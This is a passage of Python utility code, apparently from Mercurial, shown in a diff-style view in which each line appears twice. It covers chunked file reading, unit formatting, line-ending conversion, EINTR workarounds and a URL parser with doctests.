2654 # offset == 0 is enabled by block above, so this won't merely
2654 # offset == 0 is enabled by block above, so this won't merely
2655 # copy via ``chunk[0:]``.
2655 # copy via ``chunk[0:]``.
2656 buf.append(chunk[offset:])
2656 buf.append(chunk[offset:])
2657 self._chunkoffset = 0
2657 self._chunkoffset = 0
2658
2658
2659 # Partial chunk needed.
2659 # Partial chunk needed.
2660 else:
2660 else:
2661 buf.append(chunk[offset : offset + left])
2661 buf.append(chunk[offset : offset + left])
2662 self._chunkoffset += left
2662 self._chunkoffset += left
2663 left -= chunkremaining
2663 left -= chunkremaining
2664
2664
2665 return b''.join(buf)
2665 return b''.join(buf)
2666
2666
2667
2667
2668 def filechunkiter(f, size=131072, limit=None):
2668 def filechunkiter(f, size=131072, limit=None):
2669 """Create a generator that produces the data in the file size
2669 """Create a generator that produces the data in the file size
2670 (default 131072) bytes at a time, up to optional limit (default is
2670 (default 131072) bytes at a time, up to optional limit (default is
2671 to read all data). Chunks may be less than size bytes if the
2671 to read all data). Chunks may be less than size bytes if the
2672 chunk is the last chunk in the file, or the file is a socket or
2672 chunk is the last chunk in the file, or the file is a socket or
2673 some other type of file that sometimes reads less data than is
2673 some other type of file that sometimes reads less data than is
2674 requested."""
2674 requested."""
2675 assert size >= 0
2675 assert size >= 0
2676 assert limit is None or limit >= 0
2676 assert limit is None or limit >= 0
2677 while True:
2677 while True:
2678 if limit is None:
2678 if limit is None:
2679 nbytes = size
2679 nbytes = size
2680 else:
2680 else:
2681 nbytes = min(limit, size)
2681 nbytes = min(limit, size)
2682 s = nbytes and f.read(nbytes)
2682 s = nbytes and f.read(nbytes)
2683 if not s:
2683 if not s:
2684 break
2684 break
2685 if limit:
2685 if limit:
2686 limit -= len(s)
2686 limit -= len(s)
2687 yield s
2687 yield s
2688
2688
2689
2689
2690 class cappedreader(object):
2690 class cappedreader(object):
2691 """A file object proxy that allows reading up to N bytes.
2691 """A file object proxy that allows reading up to N bytes.
2692
2692
2693 Given a source file object, instances of this type allow reading up to
2693 Given a source file object, instances of this type allow reading up to
2694 N bytes from that source file object. Attempts to read past the allowed
2694 N bytes from that source file object. Attempts to read past the allowed
2695 limit are treated as EOF.
2695 limit are treated as EOF.
2696
2696
2697 It is assumed that I/O is not performed on the original file object
2697 It is assumed that I/O is not performed on the original file object
2698 in addition to I/O that is performed by this instance. If there is,
2698 in addition to I/O that is performed by this instance. If there is,
2699 state tracking will get out of sync and unexpected results will ensue.
2699 state tracking will get out of sync and unexpected results will ensue.
2700 """
2700 """
2701
2701
2702 def __init__(self, fh, limit):
2702 def __init__(self, fh, limit):
2703 """Allow reading up to <limit> bytes from <fh>."""
2703 """Allow reading up to <limit> bytes from <fh>."""
2704 self._fh = fh
2704 self._fh = fh
2705 self._left = limit
2705 self._left = limit
2706
2706
2707 def read(self, n=-1):
2707 def read(self, n=-1):
2708 if not self._left:
2708 if not self._left:
2709 return b''
2709 return b''
2710
2710
2711 if n < 0:
2711 if n < 0:
2712 n = self._left
2712 n = self._left
2713
2713
2714 data = self._fh.read(min(n, self._left))
2714 data = self._fh.read(min(n, self._left))
2715 self._left -= len(data)
2715 self._left -= len(data)
2716 assert self._left >= 0
2716 assert self._left >= 0
2717
2717
2718 return data
2718 return data
2719
2719
2720 def readinto(self, b):
2720 def readinto(self, b):
2721 res = self.read(len(b))
2721 res = self.read(len(b))
2722 if res is None:
2722 if res is None:
2723 return None
2723 return None
2724
2724
2725 b[0 : len(res)] = res
2725 b[0 : len(res)] = res
2726 return len(res)
2726 return len(res)
2727
2727
2728
2728
2729 def unitcountfn(*unittable):
2729 def unitcountfn(*unittable):
2730 '''return a function that renders a readable count of some quantity'''
2730 '''return a function that renders a readable count of some quantity'''
2731
2731
2732 def go(count):
2732 def go(count):
2733 for multiplier, divisor, format in unittable:
2733 for multiplier, divisor, format in unittable:
2734 if abs(count) >= divisor * multiplier:
2734 if abs(count) >= divisor * multiplier:
2735 return format % (count / float(divisor))
2735 return format % (count / float(divisor))
2736 return unittable[-1][2] % count
2736 return unittable[-1][2] % count
2737
2737
2738 return go
2738 return go
2739
2739
2740
2740
2741 def processlinerange(fromline, toline):
2741 def processlinerange(fromline, toline):
2742 """Check that linerange <fromline>:<toline> makes sense and return a
2742 """Check that linerange <fromline>:<toline> makes sense and return a
2743 0-based range.
2743 0-based range.
2744
2744
2745 >>> processlinerange(10, 20)
2745 >>> processlinerange(10, 20)
2746 (9, 20)
2746 (9, 20)
2747 >>> processlinerange(2, 1)
2747 >>> processlinerange(2, 1)
2748 Traceback (most recent call last):
2748 Traceback (most recent call last):
2749 ...
2749 ...
2750 ParseError: line range must be positive
2750 ParseError: line range must be positive
2751 >>> processlinerange(0, 5)
2751 >>> processlinerange(0, 5)
2752 Traceback (most recent call last):
2752 Traceback (most recent call last):
2753 ...
2753 ...
2754 ParseError: fromline must be strictly positive
2754 ParseError: fromline must be strictly positive
2755 """
2755 """
2756 if toline - fromline < 0:
2756 if toline - fromline < 0:
2757 raise error.ParseError(_(b"line range must be positive"))
2757 raise error.ParseError(_(b"line range must be positive"))
2758 if fromline < 1:
2758 if fromline < 1:
2759 raise error.ParseError(_(b"fromline must be strictly positive"))
2759 raise error.ParseError(_(b"fromline must be strictly positive"))
2760 return fromline - 1, toline
2760 return fromline - 1, toline
2761
2761
2762
2762
2763 bytecount = unitcountfn(
2763 bytecount = unitcountfn(
2764 (100, 1 << 30, _(b'%.0f GB')),
2764 (100, 1 << 30, _(b'%.0f GB')),
2765 (10, 1 << 30, _(b'%.1f GB')),
2765 (10, 1 << 30, _(b'%.1f GB')),
2766 (1, 1 << 30, _(b'%.2f GB')),
2766 (1, 1 << 30, _(b'%.2f GB')),
2767 (100, 1 << 20, _(b'%.0f MB')),
2767 (100, 1 << 20, _(b'%.0f MB')),
2768 (10, 1 << 20, _(b'%.1f MB')),
2768 (10, 1 << 20, _(b'%.1f MB')),
2769 (1, 1 << 20, _(b'%.2f MB')),
2769 (1, 1 << 20, _(b'%.2f MB')),
2770 (100, 1 << 10, _(b'%.0f KB')),
2770 (100, 1 << 10, _(b'%.0f KB')),
2771 (10, 1 << 10, _(b'%.1f KB')),
2771 (10, 1 << 10, _(b'%.1f KB')),
2772 (1, 1 << 10, _(b'%.2f KB')),
2772 (1, 1 << 10, _(b'%.2f KB')),
2773 (1, 1, _(b'%.0f bytes')),
2773 (1, 1, _(b'%.0f bytes')),
2774 )
2774 )
2775
2775
2776
2776
2777 class transformingwriter(object):
2777 class transformingwriter(object):
2778 """Writable file wrapper to transform data by function"""
2778 """Writable file wrapper to transform data by function"""
2779
2779
2780 def __init__(self, fp, encode):
2780 def __init__(self, fp, encode):
2781 self._fp = fp
2781 self._fp = fp
2782 self._encode = encode
2782 self._encode = encode
2783
2783
2784 def close(self):
2784 def close(self):
2785 self._fp.close()
2785 self._fp.close()
2786
2786
2787 def flush(self):
2787 def flush(self):
2788 self._fp.flush()
2788 self._fp.flush()
2789
2789
2790 def write(self, data):
2790 def write(self, data):
2791 return self._fp.write(self._encode(data))
2791 return self._fp.write(self._encode(data))
2792
2792
2793
2793
2794 # Matches a single EOL which can either be a CRLF where repeated CR
2794 # Matches a single EOL which can either be a CRLF where repeated CR
2795 # are removed or a LF. We do not care about old Macintosh files, so a
2795 # are removed or a LF. We do not care about old Macintosh files, so a
2796 # stray CR is an error.
2796 # stray CR is an error.
2797 _eolre = remod.compile(br'\r*\n')
2797 _eolre = remod.compile(br'\r*\n')
2798
2798
2799
2799
2800 def tolf(s):
2800 def tolf(s):
2801 return _eolre.sub(b'\n', s)
2801 return _eolre.sub(b'\n', s)
2802
2802
2803
2803
2804 def tocrlf(s):
2804 def tocrlf(s):
2805 return _eolre.sub(b'\r\n', s)
2805 return _eolre.sub(b'\r\n', s)
2806
2806
2807
2807
2808 def _crlfwriter(fp):
2808 def _crlfwriter(fp):
2809 return transformingwriter(fp, tocrlf)
2809 return transformingwriter(fp, tocrlf)
2810
2810
2811
2811
2812 if pycompat.oslinesep == b'\r\n':
2812 if pycompat.oslinesep == b'\r\n':
2813 tonativeeol = tocrlf
2813 tonativeeol = tocrlf
2814 fromnativeeol = tolf
2814 fromnativeeol = tolf
2815 nativeeolwriter = _crlfwriter
2815 nativeeolwriter = _crlfwriter
2816 else:
2816 else:
2817 tonativeeol = pycompat.identity
2817 tonativeeol = pycompat.identity
2818 fromnativeeol = pycompat.identity
2818 fromnativeeol = pycompat.identity
2819 nativeeolwriter = pycompat.identity
2819 nativeeolwriter = pycompat.identity
2820
2820
2821 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2821 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2822 3,
2822 3,
2823 0,
2823 0,
2824 ):
2824 ):
2825 # There is an issue in CPython that some IO methods do not handle EINTR
2825 # There is an issue in CPython that some IO methods do not handle EINTR
2826 # correctly. The following table shows what CPython version (and functions)
2826 # correctly. The following table shows what CPython version (and functions)
2827 # are affected (buggy: has the EINTR bug, okay: otherwise):
2827 # are affected (buggy: has the EINTR bug, okay: otherwise):
2828 #
2828 #
2829 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2829 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2830 # --------------------------------------------------
2830 # --------------------------------------------------
2831 # fp.__iter__ | buggy | buggy | okay
2831 # fp.__iter__ | buggy | buggy | okay
2832 # fp.read* | buggy | okay [1] | okay
2832 # fp.read* | buggy | okay [1] | okay
2833 #
2833 #
2834 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2834 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2835 #
2835 #
2836 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2836 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2837 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2837 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2838 #
2838 #
2839 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2839 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2840 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2840 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2841 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2841 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2842 # fp.__iter__ but not other fp.read* methods.
2842 # fp.__iter__ but not other fp.read* methods.
2843 #
2843 #
2844 # On modern systems like Linux, the "read" syscall cannot be interrupted
2844 # On modern systems like Linux, the "read" syscall cannot be interrupted
2845 # when reading "fast" files like on-disk files. So the EINTR issue only
2845 # when reading "fast" files like on-disk files. So the EINTR issue only
2846 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2846 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2847 # files approximately as "fast" files and use the fast (unsafe) code path,
2847 # files approximately as "fast" files and use the fast (unsafe) code path,
2848 # to minimize the performance impact.
2848 # to minimize the performance impact.
2849 if sys.version_info >= (2, 7, 4):
2849 if sys.version_info >= (2, 7, 4):
2850 # fp.readline deals with EINTR correctly, use it as a workaround.
2850 # fp.readline deals with EINTR correctly, use it as a workaround.
2851 def _safeiterfile(fp):
2851 def _safeiterfile(fp):
2852 return iter(fp.readline, b'')
2852 return iter(fp.readline, b'')
2853
2853
2854 else:
2854 else:
2855 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2855 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2856 # note: this may block longer than necessary because of bufsize.
2856 # note: this may block longer than necessary because of bufsize.
2857 def _safeiterfile(fp, bufsize=4096):
2857 def _safeiterfile(fp, bufsize=4096):
2858 fd = fp.fileno()
2858 fd = fp.fileno()
2859 line = b''
2859 line = b''
2860 while True:
2860 while True:
2861 try:
2861 try:
2862 buf = os.read(fd, bufsize)
2862 buf = os.read(fd, bufsize)
2863 except OSError as ex:
2863 except OSError as ex:
2864 # os.read only raises EINTR before any data is read
2864 # os.read only raises EINTR before any data is read
2865 if ex.errno == errno.EINTR:
2865 if ex.errno == errno.EINTR:
2866 continue
2866 continue
2867 else:
2867 else:
2868 raise
2868 raise
2869 line += buf
2869 line += buf
2870 if b'\n' in buf:
2870 if b'\n' in buf:
2871 splitted = line.splitlines(True)
2871 splitted = line.splitlines(True)
2872 line = b''
2872 line = b''
2873 for l in splitted:
2873 for l in splitted:
2874 if l[-1] == b'\n':
2874 if l[-1] == b'\n':
2875 yield l
2875 yield l
2876 else:
2876 else:
2877 line = l
2877 line = l
2878 if not buf:
2878 if not buf:
2879 break
2879 break
2880 if line:
2880 if line:
2881 yield line
2881 yield line
2882
2882
2883 def iterfile(fp):
2883 def iterfile(fp):
2884 fastpath = True
2884 fastpath = True
2885 if type(fp) is file:
2885 if type(fp) is file:
2886 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2886 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2887 if fastpath:
2887 if fastpath:
2888 return fp
2888 return fp
2889 else:
2889 else:
2890 return _safeiterfile(fp)
2890 return _safeiterfile(fp)
2891
2891
2892
2892
2893 else:
2893 else:
2894 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2894 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2895 def iterfile(fp):
2895 def iterfile(fp):
2896 return fp
2896 return fp
2897
2897
2898
2898
2899 def iterlines(iterator):
2899 def iterlines(iterator):
2900 for chunk in iterator:
2900 for chunk in iterator:
2901 for line in chunk.splitlines():
2901 for line in chunk.splitlines():
2902 yield line
2902 yield line
2903
2903
2904
2904
2905 def expandpath(path):
2905 def expandpath(path):
2906 return os.path.expanduser(os.path.expandvars(path))
2906 return os.path.expanduser(os.path.expandvars(path))
2907
2907
2908
2908
2909 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2909 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2910 """Return the result of interpolating items in the mapping into string s.
2910 """Return the result of interpolating items in the mapping into string s.
2911
2911
2912 prefix is a single character string, or a two character string with
2912 prefix is a single character string, or a two character string with
2913 a backslash as the first character if the prefix needs to be escaped in
2913 a backslash as the first character if the prefix needs to be escaped in
2914 a regular expression.
2914 a regular expression.
2915
2915
2916 fn is an optional function that will be applied to the replacement text
2916 fn is an optional function that will be applied to the replacement text
2917 just before replacement.
2917 just before replacement.
2918
2918
2919 escape_prefix is an optional flag that allows using doubled prefix for
2919 escape_prefix is an optional flag that allows using doubled prefix for
2920 its escaping.
2920 its escaping.
2921 """
2921 """
2922 fn = fn or (lambda s: s)
2922 fn = fn or (lambda s: s)
2923 patterns = b'|'.join(mapping.keys())
2923 patterns = b'|'.join(mapping.keys())
2924 if escape_prefix:
2924 if escape_prefix:
2925 patterns += b'|' + prefix
2925 patterns += b'|' + prefix
2926 if len(prefix) > 1:
2926 if len(prefix) > 1:
2927 prefix_char = prefix[1:]
2927 prefix_char = prefix[1:]
2928 else:
2928 else:
2929 prefix_char = prefix
2929 prefix_char = prefix
2930 mapping[prefix_char] = prefix_char
2930 mapping[prefix_char] = prefix_char
2931 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2931 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2932 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2932 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2933
2933
2934
2934
2935 def getport(port):
2935 def getport(port):
2936 """Return the port for a given network service.
2936 """Return the port for a given network service.
2937
2937
2938 If port is an integer, it's returned as is. If it's a string, it's
2938 If port is an integer, it's returned as is. If it's a string, it's
2939 looked up using socket.getservbyname(). If there's no matching
2939 looked up using socket.getservbyname(). If there's no matching
2940 service, error.Abort is raised.
2940 service, error.Abort is raised.
2941 """
2941 """
2942 try:
2942 try:
2943 return int(port)
2943 return int(port)
2944 except ValueError:
2944 except ValueError:
2945 pass
2945 pass
2946
2946
2947 try:
2947 try:
2948 return socket.getservbyname(pycompat.sysstr(port))
2948 return socket.getservbyname(pycompat.sysstr(port))
2949 except socket.error:
2949 except socket.error:
2950 raise error.Abort(
2950 raise error.Abort(
2951 _(b"no port number associated with service '%s'") % port
2951 _(b"no port number associated with service '%s'") % port
2952 )
2952 )
2953
2953
2954
2954
2955 class url(object):
2955 class url(object):
2956 r"""Reliable URL parser.
2956 r"""Reliable URL parser.
2957
2957
2958 This parses URLs and provides attributes for the following
2958 This parses URLs and provides attributes for the following
2959 components:
2959 components:
2960
2960
2961 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2961 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2962
2962
2963 Missing components are set to None. The only exception is
2963 Missing components are set to None. The only exception is
2964 fragment, which is set to '' if present but empty.
2964 fragment, which is set to '' if present but empty.
2965
2965
2966 If parsefragment is False, fragment is included in query. If
2966 If parsefragment is False, fragment is included in query. If
2967 parsequery is False, query is included in path. If both are
2967 parsequery is False, query is included in path. If both are
2968 False, both fragment and query are included in path.
2968 False, both fragment and query are included in path.
2969
2969
2970 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2970 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2971
2971
2972 Note that for backward compatibility reasons, bundle URLs do not
2972 Note that for backward compatibility reasons, bundle URLs do not
2973 take host names. That means 'bundle://../' has a path of '../'.
2973 take host names. That means 'bundle://../' has a path of '../'.
2974
2974
2975 Examples:
2975 Examples:
2976
2976
2977 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2977 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2978 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2978 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2979 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2979 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2980 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2980 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2981 >>> url(b'file:///home/joe/repo')
2981 >>> url(b'file:///home/joe/repo')
2982 <url scheme: 'file', path: '/home/joe/repo'>
2982 <url scheme: 'file', path: '/home/joe/repo'>
2983 >>> url(b'file:///c:/temp/foo/')
2983 >>> url(b'file:///c:/temp/foo/')
2984 <url scheme: 'file', path: 'c:/temp/foo/'>
2984 <url scheme: 'file', path: 'c:/temp/foo/'>
2985 >>> url(b'bundle:foo')
2985 >>> url(b'bundle:foo')
2986 <url scheme: 'bundle', path: 'foo'>
2986 <url scheme: 'bundle', path: 'foo'>
2987 >>> url(b'bundle://../foo')
2987 >>> url(b'bundle://../foo')
2988 <url scheme: 'bundle', path: '../foo'>
2988 <url scheme: 'bundle', path: '../foo'>
2989 >>> url(br'c:\foo\bar')
2989 >>> url(br'c:\foo\bar')
2990 <url path: 'c:\\foo\\bar'>
2990 <url path: 'c:\\foo\\bar'>
2991 >>> url(br'\\blah\blah\blah')
2991 >>> url(br'\\blah\blah\blah')
2992 <url path: '\\\\blah\\blah\\blah'>
2992 <url path: '\\\\blah\\blah\\blah'>
2993 >>> url(br'\\blah\blah\blah#baz')
2993 >>> url(br'\\blah\blah\blah#baz')
2994 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2994 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2995 >>> url(br'file:///C:\users\me')
2995 >>> url(br'file:///C:\users\me')
2996 <url scheme: 'file', path: 'C:\\users\\me'>
2996 <url scheme: 'file', path: 'C:\\users\\me'>
2997
2997
2998 Authentication credentials:
2998 Authentication credentials:
2999
2999
3000 >>> url(b'ssh://joe:xyz@x/repo')
3000 >>> url(b'ssh://joe:xyz@x/repo')
3001 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3001 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3002 >>> url(b'ssh://joe@x/repo')
3002 >>> url(b'ssh://joe@x/repo')
3003 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3003 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3004
3004
3005 Query strings and fragments:
3005 Query strings and fragments:
3006
3006
3007 >>> url(b'http://host/a?b#c')
3007 >>> url(b'http://host/a?b#c')
3008 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3008 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3009 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3009 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3010 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3010 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3011
3011
3012 Empty path:
3012 Empty path:
3013
3013
3014 >>> url(b'')
3014 >>> url(b'')
3015 <url path: ''>
3015 <url path: ''>
3016 >>> url(b'#a')
3016 >>> url(b'#a')
3017 <url path: '', fragment: 'a'>
3017 <url path: '', fragment: 'a'>
3018 >>> url(b'http://host/')
3018 >>> url(b'http://host/')
3019 <url scheme: 'http', host: 'host', path: ''>
3019 <url scheme: 'http', host: 'host', path: ''>
3020 >>> url(b'http://host/#a')
3020 >>> url(b'http://host/#a')
3021 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3021 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3022
3022
3023 Only scheme:
3023 Only scheme:
3024
3024
3025 >>> url(b'http:')
3025 >>> url(b'http:')
3026 <url scheme: 'http'>
3026 <url scheme: 'http'>
3027 """
3027 """
3028
3028
3029 _safechars = b"!~*'()+"
3029 _safechars = b"!~*'()+"
3030 _safepchars = b"/!~*'()+:\\"
3030 _safepchars = b"/!~*'()+:\\"
3031 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3031 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3032
3032
3033 def __init__(self, path, parsequery=True, parsefragment=True):
3033 def __init__(self, path, parsequery=True, parsefragment=True):
3034 # We slowly chomp away at path until we have only the path left
3034 # We slowly chomp away at path until we have only the path left
3035 self.scheme = self.user = self.passwd = self.host = None
3035 self.scheme = self.user = self.passwd = self.host = None
3036 self.port = self.path = self.query = self.fragment = None
3036 self.port = self.path = self.query = self.fragment = None
3037 self._localpath = True
3037 self._localpath = True
3038 self._hostport = b''
3038 self._hostport = b''
3039 self._origpath = path
3039 self._origpath = path
3040
3040
3041 if parsefragment and b'#' in path:
3041 if parsefragment and b'#' in path:
3042 path, self.fragment = path.split(b'#', 1)
3042 path, self.fragment = path.split(b'#', 1)
3043
3043
3044 # special case for Windows drive letters and UNC paths
3044 # special case for Windows drive letters and UNC paths
3045 if hasdriveletter(path) or path.startswith(b'\\\\'):
3045 if hasdriveletter(path) or path.startswith(b'\\\\'):
3046 self.path = path
3046 self.path = path
3047 return
3047 return
3048
3048
3049 # For compatibility reasons, we can't handle bundle paths as
3049 # For compatibility reasons, we can't handle bundle paths as
3050 # normal URLS
3050 # normal URLS
3051 if path.startswith(b'bundle:'):
3051 if path.startswith(b'bundle:'):
3052 self.scheme = b'bundle'
3052 self.scheme = b'bundle'
3053 path = path[7:]
3053 path = path[7:]
3054 if path.startswith(b'//'):
3054 if path.startswith(b'//'):
3055 path = path[2:]
3055 path = path[2:]
3056 self.path = path
3056 self.path = path
3057 return
3057 return
3058
3058
3059 if self._matchscheme(path):
3059 if self._matchscheme(path):
3060 parts = path.split(b':', 1)
3060 parts = path.split(b':', 1)
3061 if parts[0]:
3061 if parts[0]:
3062 self.scheme, path = parts
3062 self.scheme, path = parts
3063 self._localpath = False
3063 self._localpath = False
3064
3064
3065 if not path:
3065 if not path:
3066 path = None
3066 path = None
3067 if self._localpath:
3067 if self._localpath:
3068 self.path = b''
3068 self.path = b''
3069 return
3069 return
3070 else:
3070 else:
3071 if self._localpath:
3071 if self._localpath:
3072 self.path = path
3072 self.path = path
3073 return
3073 return
3074
3074
3075 if parsequery and b'?' in path:
3075 if parsequery and b'?' in path:
3076 path, self.query = path.split(b'?', 1)
3076 path, self.query = path.split(b'?', 1)
3077 if not path:
3077 if not path:
3078 path = None
3078 path = None
3079 if not self.query:
3079 if not self.query:
3080 self.query = None
3080 self.query = None
3081
3081
3082 # // is required to specify a host/authority
3082 # // is required to specify a host/authority
3083 if path and path.startswith(b'//'):
3083 if path and path.startswith(b'//'):
3084 parts = path[2:].split(b'/', 1)
3084 parts = path[2:].split(b'/', 1)
3085 if len(parts) > 1:
3085 if len(parts) > 1:
3086 self.host, path = parts
3086 self.host, path = parts
3087 else:
3087 else:
3088 self.host = parts[0]
3088 self.host = parts[0]
3089 path = None
3089 path = None
3090 if not self.host:
3090 if not self.host:
3091 self.host = None
3091 self.host = None
3092 # path of file:///d is /d
3092 # path of file:///d is /d
3093 # path of file:///d:/ is d:/, not /d:/
3093 # path of file:///d:/ is d:/, not /d:/
3094 if path and not hasdriveletter(path):
3094 if path and not hasdriveletter(path):
3095 path = b'/' + path
3095 path = b'/' + path
3096
3096
3097 if self.host and b'@' in self.host:
3097 if self.host and b'@' in self.host:
3098 self.user, self.host = self.host.rsplit(b'@', 1)
3098 self.user, self.host = self.host.rsplit(b'@', 1)
3099 if b':' in self.user:
3099 if b':' in self.user:
3100 self.user, self.passwd = self.user.split(b':', 1)
3100 self.user, self.passwd = self.user.split(b':', 1)
3101 if not self.host:
3101 if not self.host:
3102 self.host = None
3102 self.host = None
3103
3103
3104 # Don't split on colons in IPv6 addresses without ports
3104 # Don't split on colons in IPv6 addresses without ports
3105 if (
3105 if (
3106 self.host
3106 self.host
3107 and b':' in self.host
3107 and b':' in self.host
3108 and not (
3108 and not (
3109 self.host.startswith(b'[') and self.host.endswith(b']')
3109 self.host.startswith(b'[') and self.host.endswith(b']')
3110 )
3110 )
3111 ):
3111 ):
3112 self._hostport = self.host
3112 self._hostport = self.host
3113 self.host, self.port = self.host.rsplit(b':', 1)
3113 self.host, self.port = self.host.rsplit(b':', 1)
3114 if not self.host:
3114 if not self.host:
3115 self.host = None
3115 self.host = None
3116
3116
3117 if (
3117 if (
3118 self.host
3118 self.host
3119 and self.scheme == b'file'
3119 and self.scheme == b'file'
3120 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3120 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3121 ):
3121 ):
3122 raise error.Abort(
3122 raise error.Abort(
3123 _(b'file:// URLs can only refer to localhost')
3123 _(b'file:// URLs can only refer to localhost')
3124 )
3124 )
3125
3125
3126 self.path = path
3126 self.path = path
3127
3127
3128 # leave the query string escaped
3128 # leave the query string escaped
3129 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3129 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3130 v = getattr(self, a)
3130 v = getattr(self, a)
3131 if v is not None:
3131 if v is not None:
3132 setattr(self, a, urlreq.unquote(v))
3132 setattr(self, a, urlreq.unquote(v))
3133
3133
3134 @encoding.strmethod
3134 @encoding.strmethod
3135 def __repr__(self):
3135 def __repr__(self):
3136 attrs = []
3136 attrs = []
3137 for a in (
3137 for a in (
3138 b'scheme',
3138 b'scheme',
3139 b'user',
3139 b'user',
3140 b'passwd',
3140 b'passwd',
3141 b'host',
3141 b'host',
3142 b'port',
3142 b'port',
3143 b'path',
3143 b'path',
3144 b'query',
3144 b'query',
3145 b'fragment',
3145 b'fragment',
3146 ):
3146 ):
3147 v = getattr(self, a)
3147 v = getattr(self, a)
3148 if v is not None:
3148 if v is not None:
3149 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3149 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3150 return b'<url %s>' % b', '.join(attrs)
3150 return b'<url %s>' % b', '.join(attrs)
3151
3151
3152 def __bytes__(self):
3152 def __bytes__(self):
3153 r"""Join the URL's components back into a URL string.
3153 r"""Join the URL's components back into a URL string.
3154
3154
3155 Examples:
3155 Examples:
3156
3156
3157 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3157 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3158 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3158 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3159 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3159 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3160 'http://user:pw@host:80/?foo=bar&baz=42'
3160 'http://user:pw@host:80/?foo=bar&baz=42'
3161 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3161 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3162 'http://user:pw@host:80/?foo=bar%3dbaz'
3162 'http://user:pw@host:80/?foo=bar%3dbaz'
3163 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3163 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3164 'ssh://user:pw@[::1]:2200//home/joe#'
3164 'ssh://user:pw@[::1]:2200//home/joe#'
3165 >>> bytes(url(b'http://localhost:80//'))
3165 >>> bytes(url(b'http://localhost:80//'))
3166 'http://localhost:80//'
3166 'http://localhost:80//'
3167 >>> bytes(url(b'http://localhost:80/'))
3167 >>> bytes(url(b'http://localhost:80/'))
3168 'http://localhost:80/'
3168 'http://localhost:80/'
3169 >>> bytes(url(b'http://localhost:80'))
3169 >>> bytes(url(b'http://localhost:80'))
3170 'http://localhost:80/'
3170 'http://localhost:80/'
3171 >>> bytes(url(b'bundle:foo'))
3171 >>> bytes(url(b'bundle:foo'))
3172 'bundle:foo'
3172 'bundle:foo'
